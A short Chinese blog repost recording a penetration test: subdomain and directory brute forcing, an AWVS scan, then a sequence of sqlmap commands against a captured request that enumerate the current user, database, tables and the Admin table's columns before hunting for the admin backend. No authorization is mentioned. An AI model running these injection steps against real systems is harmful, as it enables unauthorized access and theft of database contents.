博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
记渗透
阅读量:7006 次
发布时间:2019-06-27

本文共 568 字,大约阅读时间需要 1 分钟。

hot3.png

                                                                         渗透记录

1.

信息收集:

子域名爆破,通过Layer爆破子域名

御剑扫描目录信息:

 

扫描到敏感路径,发现有信息泄露:

写脚本扫描泄露的信息,收集泄露的子域名信息,

2.扫描漏洞

在wvs中,添加收集到的目标,并对其新建扫描

扫描结果:

 

查看扫描详细信息,并且记录下http请求包,放到文件1.txt中,启动sqlmap,

扫描记录下的文件,扫描其中的http请求

sqlmap -r /opt/1.txt 

扫描可能有漏洞的指定参数

sqlmap -r /opt/1.txt  -p newsTitle

发现为sqlserver,看是否有sa权限

sqlmap -r /opt/1.txt  -p newsTitle --current-user

跑数据库

sqlmap -r /opt/1.txt  -p newsTitle --current-db

跑表

sqlmap -r /opt/1.txt  -p newsTitle -D 'xxxx' --tables

表详细信息,列名

sqlmap -r /opt/1.txt  -p newsTitle -D 'xxxx' -T Admin --columns

得到结果后,扫描后台路径,验证数据

 

 

 

 

转载于:https://my.oschina.net/phybrain/blog/1554978

你可能感兴趣的文章
The Frog's Games(二分)
查看>>
Android 文件访问权限的四种模式
查看>>
安卓Android科大讯飞语音识别代码使用详解
查看>>
English - little,a little,a few,few的区别
查看>>
Jquery属性获取——attr()与prop()
查看>>
Mysql shell 控制台---mysqlsh
查看>>
JQuery的ready函数与JS的onload的区别详解
查看>>
eclipse出现错误:he type java.util.Map$Entry cannot be resolved. It is indirectly referenced
查看>>
yii2权限控制rbac之rule详细讲解
查看>>
Android AbsListView Abs前缀
查看>>
Redis应用场景一
查看>>
webservice 协议
查看>>
SAR-303 xml validator验证框架
查看>>
牛腩学用MUI做手机APP
查看>>
WCF--安全小见解...
查看>>
C# Type.GetConstructor() 根据构造函数参数获取实例对象(一)
查看>>
针对各地项目icomet停止服务的临时处理办法
查看>>
Spring源代码解析
查看>>
搞明白这八个问题,Linux系统就好学多了
查看>>
Android Weekly Notes Issue #222
查看>>